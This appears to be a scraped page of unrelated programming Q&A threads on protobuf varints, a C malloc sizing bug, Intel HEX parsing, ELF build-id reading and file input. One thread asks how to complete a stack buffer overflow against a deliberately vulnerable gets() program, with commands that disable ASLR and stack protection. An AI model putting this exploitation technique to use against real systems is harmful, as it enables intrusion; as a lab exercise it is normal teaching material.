linux rpc: Varint for protobuf encoding : not expected value - linux

I'm using google protocol buffer library with:
$protoc --version
libprotoc 2.5.0
I search internet and it says the value encoding of a integer consists of multibytes that each byte 1st bit, is the indicator to say whether the encoding should continue to another byte. My understanding:
For a number 101 (0x65), it has only 1 byte, so its encoded value is still 0x65
For a number 0x6565, as long as it has 2 bytes, and intel uses little endian, the 1st byte should modify its first bit to be 1, and thus 0x65+0x80=0xe5, so the whole integer will have 2 bytes, and should become
0x65e5
This is my expectation. but I tested with my sample program. First I tried to set a "0x65" value to log7.data, and set "0x6565" to log8.data, and use xxl command to check them
cat 7.proto
message hello
{
required int32 f1=1;
}
$cat 7.cpp
#include "7.pb.h"
#include<fstream>
using namespace std;
int main()
{
fstream f("./log7.data",ios::binary|ios::out);
hello p;
p.set_f1(0x65);
p.SerializeToOstream(&f);
return 0;
}
$cat 8.cpp
#include ".pb.h"
#include<fstream>
using namespace std;
int main()
{
fstream f("./log8.data",ios::binary|ios::out);
hello p;
p.set_f1(0x6565);
p.SerializeToOstream(&f);
return 0;
}
Check the output:
$protoc 7.proto --cpp_out=./
g++ 7.cpp 7.pb.cc -lprotobuf && ./a.out && xxd log7.data
00000000: 0865 .e
$protoc 8.proto --cpp_out=./
$g++ 8.cpp 8.pb.cc -lprotobuf && ./a.out && xxd log8.data
00000000: 08e5 ca01 ....
You can see, for log8.data, I expect it to be "08e5 65", but it's actually "08e5 ca01". How to explain this value?
Thanks.

you need to split by 7 bit and add first bit
0x6565 => to binary
0b110010101100101 => split by 7 bit
0b1 1001010 1100101 => add first bit except first
0b1 11001010 11100101 => now show in hex
0x01cae5

Related

C Function to return a String resulting in corrupted top size

I am trying to write a program that calls upon an [external library (?)] (I'm not sure that I'm using the right terminology here) that I am also writing to clean up a provided string. For example, if my main.c program were to be provided with a string such as:
asdfFAweWFwseFL Wefawf JAWEFfja FAWSEF
it would call upon a function in externalLibrary.c (lets call it externalLibrary_Clean for now) that would take in the string, and return all characters in upper case without spaces:
ASDFFAWEWFWSEFLWEFAWFJAWEFFJAFAWSEF
The crazy part is that I have this working... so long as my string doesn't exceed 26 characters in length. As soon as I add a 27th character, I end up with an error that says
malloc(): corrupted top size.
Here is externalLibrary.c:
#include "externalLibrary.h"
#include <ctype.h>
#include <malloc.h>
#include <assert.h>
#include <string.h>
char * restrict externalLibrary_Clean(const char* restrict input) {
// first we define the return value as a pointer and initialize
// an integer to count the length of the string
char * returnVal = malloc(sizeof(input));
char * initialReturnVal = returnVal; //point to the start location
// until we hit the end of the string, we use this while loop to
// iterate through it
while (*input != '\0') {
if (isalpha(*input)) { // if we encounter an alphabet character (a-z/A-Z)
// then we convert it to an uppercase value and point our return value at it
*returnVal = toupper(*input);
returnVal++; //we use this to move our return value to the next location in memory
}
input++; // we move to the next memory location on the provided character pointer
}
*returnVal = '\0'; //once we have exhausted the input character pointer, we terminate our return value
return initialReturnVal;
}
int * restrict externalLibrary_getFrequencies(char * ar, int length){
static int freq[26];
for (int i = 0; i < length; i++){
freq[(ar[i]-65)]++;
}
return freq;
}
the header file for it (externalLibrary.h):
#ifndef LEARNINGC_EXTERNALLIBRARY_H
#define LEARNINGC_EXTERNALLIBRARY_H
#ifdef __cplusplus
extern "C" {
#endif
char * restrict externalLibrary_Clean(const char* restrict input);
int * restrict externalLibrary_getFrequencies(char * ar, int length);
#ifdef __cplusplus
}
#endif
#endif //LEARNINGC_EXTERNALLIBRARY_H
my main.c file from where all the action is happening:
#include <stdio.h>
#include "externalLibrary.h"
int main() {
char * unfilteredString = "ASDFOIWEGOASDGLKASJGISUAAAA";//if this exceeds 26 characters, the program breaks
char * cleanString = externalLibrary_Clean(unfilteredString);
//int * charDist = externalLibrary_getFrequencies(cleanString, 25); //this works just fine... for now
printf("\nOutput: %s\n", unfilteredString);
printf("\nCleaned Output: %s\n", cleanString);
/*for(int i = 0; i < 26; i++){
if(charDist[i] == 0){
}
else {
printf("%c: %d \n", (i + 65), charDist[i]);
}
}*/
return 0;
}
I'm extremely well versed in Java programming and I'm trying to translate my knowledge over to C as I wish to learn how my computer works in more detail (and have finer control over things such as memory).
If I were solving this problem in Java, it would be as simple as creating two class files: one called main.java and one called externalLibrary.java, where I would have static String Clean(string input) and then call upon it in main.java with String cleanString = externalLibrary.Clean(unfilteredString).
Clearly this isn't how C works, but I want to learn how (and why my code is crashing with corrupted top size)
The bug is this line:
char * returnVal = malloc(sizeof(input));
The reason it is a bug is that it requests an allocation large enough space to store a pointer, meaning 8 bytes in a 64-bit program. What you want to do is to allocate enough space to store the modified string, which you can do with the following line:
char *returnVal = malloc(strlen(input) + 1);
So the other part of your question is why the program doesn't crash when your string is less than 26 characters. The reason is that malloc is allowed to give the caller slightly more than the caller requested.
In your case, the message "malloc(): corrupted top size" suggests that you are using libc malloc, which is the default on Linux. That variant of malloc, in a 64-bit process, would always give you at least 0x18 (24) bytes (minimum chunk size 0x20 - 8 bytes for the size/status). In the specific case that the allocation immediately precedes the "top" allocation, writing past the end of the allocation will clobber the "top" size.
If your string is larger than 23 (0x17) you will start to clobber the size/status of the subsequent allocation because you also need 1 byte to store the trailing NULL. However, any string 23 characters or shorter will not cause a problem.
As to why you didn't get an error with a string with 26 characters, to answer that one would have to see that exact program with the string of 26 characters that does not crash to give a more precise answer. For example, if the program provided a 26-character input that contained 3 blanks, this would would require only 26 + 1 - 3 = 24 bytes in the allocation, which would fit.
If you are not interested in that level of detail, fixing the malloc call to request the proper amount will fix your crash.

Printing Lines from Intel HEX Record File

I'm trying to send the contents of an Intel Hex file over a Serial connection to a microcontroller, which will process each line sent and program them into memory as needed. The processing code expects the lines to be sent as they appear in the Hex file, including the newline characters at the end of each line.
This code is being run in Visual Studio 2013 on a Windows 10 PC; for reference, the microcontroller is an ARM Cortex-M0+ model.
However, the following code doesn't seem to be processing the Intel Hex record file the way that I expected.
...
int count = 0;
char hexchar;
unsigned char Buffer[69]; // 69 is max ascii hex read length for microcontroller
ifstream hexfile("pdu.hex");
while (hexfile.get(hexchar))
{
Buffer[count] = hexchar;
count++;
if (hexchar == '\n')
{
for (int i = 0; i < count; i++)
{
printf("%c", Buffer[i]);
}
serial_tx_function(Buffer); // microcontroller requires unsigned char
count = 0;
}
}
...
Currently, the serial transmission call is commented out, and the for loop is there to verify that the file is being read properly. I expect to see each line of the hex file printed out to the terminal. Instead, I get nothing at all. Any ideas?
EDIT: After further investigation, I determined that the program isn't even entering the while loop because the file fails to open. I don't know why that would be the case, since the file exists and can be opened in other programs like Notepad. However, I'm not terribly experienced with file I/O, so I might be overlooking something.
*.hex files contain non-ascii data a lot of the times that can have issues being printed out on command-line terminals.
I would just say you should try to open the file as a binary and print the characters as hexadecimal numbers.
So make sure you open the file in binary mode with ifstream hexfile("pdu.hex", ifstream::binary); and if you want to print hex characters the printf specifier is %x or %hhx for char.
The whole program would look something like this:
#include <iostream>
#include <fstream>
#include <cassert>
int main()
{
using namespace std;
int count = 0;
char hexchar;
constexpr int MAX_LINE_LENGTH = 69;
unsigned char Buffer[MAX_LINE_LENGTH]; // 69 is max ascii hex read length for microcontroller
ifstream hexfile("pdu.hex",ios::binary);
while (hexfile.get(hexchar))
{
assert(count < MAX_LINE_LENGTH);
Buffer[count] = hexchar;
count++;
if (hexchar == '\n')
{
for (int i = 0; i < count; i++)
{
printf("%hhx ", Buffer[i]);
}
printf("\n");
//serial_tx_function(Buffer); // microcontroller requires unsigned char
count = 0;
}
}
}

Writing a buffer overflow exploit

I understand there are quite a few tutorials on how to write a buffer overflow, but still can't write my own.
The following is the C code I want to hack:
#include <stdio.h>
#include <stdlib.h>
static int x = 8;
void prompt(){
char buf[100];
gets(buf);
printf("You entered: %s\n", buf);
}
int main(){
prompt();
return 0;
}
void target(){
printf("Haha! I made it!\n");
exit(0);
}
My goal is to execute the target () function via a buffer overflow exploit.
Through trial and error, I've discovered the minimum number of characters required to obtain a segmentation fault is 108. (Therefore 107 characters does NOT cause seg fault)
I've disassembled the binary, and found the target executable to be at address 0x08048e7f
I've flipped the byte order to compensate for endian-ness. --> 0x7f8e0408
I then converted that hexadecimal to a binary, then to ASCII, obtaining: & # 3 8 1 ; (ignore spaces, stackoverflow doesn't properly show it originally)
Afterwards, I inserted the first 107 characters, and then Ž
Thus, my attack string is: iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiŽ
This still gives me a segmentation fault.
I've compiled like so:
gcc ./vuln_program.c -fno-stack-protector -z execstack -static -o vuln_program
and have disabled protections beforehand like so:
sudo sysctl -w kernel.randomize_va_space=0
I am using a 32 bit Ubuntu virtual machine.
Any ideas?
Thank you.
EDIT:
I just realized that my output on this site is being read as weird characters.
If you see a weird Z, it really is 1) & 2) # 3) 3 4)8 5) 1 6) ; in that exact order

can a program read its own elf section?

I would like to use ld's --build-id option in order to add build information to my binary. However, I'm not sure how to make this information available inside the program. Assume I want to write a program that writes a backtrace every time an exception occurs, and a script that parses this information. The script reads the symbol table of the program and searches for the addresses printed in the backtrace (I'm forced to use such a script because the program is statically linked and backtrace_symbols is not working). In order for the script to work correctly I need to match build version of the program with the build version of the program which created the backtrace. How can I print the build version of the program (located in the .note.gnu.build-id elf section) from the program itself?
How can I print the build version of the program (located in the .note.gnu.build-id elf section) from the program itself?
You need to read the ElfW(Ehdr) (at the beginning of the file) to find program headers in your binary (.e_phoff and .e_phnum will tell you where program headers are, and how many of them to read).
You then read program headers, until you find PT_NOTE segment of your program. That segment will tell you offset to the beginning of all the notes in your binary.
You then need to read the ElfW(Nhdr) and skip the rest of the note (total size of the note is sizeof(Nhdr) + .n_namesz + .n_descsz, properly aligned), until you find a note with .n_type == NT_GNU_BUILD_ID.
Once you find NT_GNU_BUILD_ID note, skip past its .n_namesz, and read the .n_descsz bytes to read the actual build-id.
You can verify that you are reading the right data by comparing what you read with the output of readelf -n a.out.
P.S.
If you are going to go through the trouble to decode build-id as above, and if your executable is not stripped, it may be better for you to just decode and print symbol names instead (i.e. to replicate what backtrace_symbols does) -- it's actually easier to do than decoding ELF notes, because the symbol table contains fixed-sized entries.
Basically, this is the code I've written based on answer given to my question. In order to compile the code I had to make some changes and I hope it will work for as many types of platforms as possible. However, it was tested only on one build machine. One of the assumptions I used was that the program was built on the machine which runs it so no point in checking endianness compatibility between the program and the machine.
user#:~/$ uname -s -r -m -o
Linux 3.2.0-45-generic x86_64 GNU/Linux
user#:~/$ g++ test.cpp -o test
user#:~/$ readelf -n test | grep Build
Build ID: dc5c4682e0282e2bd8bc2d3b61cfe35826aa34fc
user#:~/$ ./test
Build ID: dc5c4682e0282e2bd8bc2d3b61cfe35826aa34fc
#include <elf.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#if __x86_64__
# define ElfW(type) Elf64_##type
#else
# define ElfW(type) Elf32_##type
#endif
/*
detecting build id of a program from its note section
http://stackoverflow.com/questions/17637745/can-a-program-read-its-own-elf-section
http://www.scs.stanford.edu/histar/src/pkg/uclibc/utils/readelf.c
http://www.sco.com/developers/gabi/2000-07-17/ch5.pheader.html#note_section
*/
int main (int argc, char* argv[])
{
char *thefilename = argv[0];
FILE *thefile;
struct stat statbuf;
ElfW(Ehdr) *ehdr = 0;
ElfW(Phdr) *phdr = 0;
ElfW(Nhdr) *nhdr = 0;
if (!(thefile = fopen(thefilename, "r"))) {
perror(thefilename);
exit(EXIT_FAILURE);
}
if (fstat(fileno(thefile), &statbuf) < 0) {
perror(thefilename);
exit(EXIT_FAILURE);
}
ehdr = (ElfW(Ehdr) *)mmap(0, statbuf.st_size,
PROT_READ|PROT_WRITE, MAP_PRIVATE, fileno(thefile), 0);
phdr = (ElfW(Phdr) *)(ehdr->e_phoff + (size_t)ehdr);
while (phdr->p_type != PT_NOTE)
{
++phdr;
}
nhdr = (ElfW(Nhdr) *)(phdr->p_offset + (size_t)ehdr);
while (nhdr->n_type != NT_GNU_BUILD_ID)
{
nhdr = (ElfW(Nhdr) *)((size_t)nhdr + sizeof(ElfW(Nhdr)) + nhdr->n_namesz + nhdr->n_descsz);
}
unsigned char * build_id = (unsigned char *)malloc(nhdr->n_descsz);
memcpy(build_id, (void *)((size_t)nhdr + sizeof(ElfW(Nhdr)) + nhdr->n_namesz), nhdr->n_descsz);
printf(" Build ID: ");
for (int i = 0 ; i < nhdr->n_descsz ; ++i)
{
printf("%02x",build_id[i]);
}
free(build_id);
printf("\n");
return 0;
}
Yes, a program can read its own .note.gnu.build-id. The important piece is the dl_iterate_phdr function.
I've used this technique in Mesa (the OpenGL/Vulkan implementation) to read its own build-id for use with the on-disk shader cache.
I've extracted those bits into a separate project[1] for easy use by others.
[1] https://github.com/mattst88/build-id

Read line by line from text file c++

I have a file with random data for accounts.
The data in the file:
5
2871 2.19 8
1234 95.04 23
3341 0.00 10
3221 -1.08 21
7462 404.14 4
3425 4784.00 200
3701 99.50
JUNK SHOULD NEVER GET HERE
3333
The first number 5 will always be the number of accounts that need to be processed.
I want to be able to read that number and set it as the number of accounts.
So my question is how can I read the file and read line by line and set the first number to the number of accounts that need to be processed.
Code so far:
#include <iostream>
#include <fstream>
#include <string>
using namespace std;
int main()
{
double NumberOfAccounts;
ifstream File("test.dat");
string line;
if(File)
{
while(getline(File,line))
{
NumberOfAccounts=line[0];
}
File.close();
}
cout<<NumberOfAccounts;
system("pause");
return 0;
}
Right now it just prints out 51.
Any tips/help would be appreciated.
Two things. One, you're getting stuck in a while loop (while there's a line left, read it in and re-assign the number of accounts) until the end of the file. Secondly, ASCII numbers do not correspond to actual numbers, so the character "0" is actually the number 48. You're getting 51 as the program reads the last line, finds the "3" character, assigns that to an integer (which is now 51), then outputs it.
NumberOfAccpounts is double, you are assigning the first character of line...
I assume you menat the first line in the file.
My C++ is crap so
pseudocode
if(File)
{
if getLine(File, line)
{
NumberOfAccounts =atof(line);
}
File.close();
}
cout<<NumberOfAccounts;
system("pause");
return 0;
atof is one way to convert a string to a double. You don't need to read the entire file to get the first line.

Resources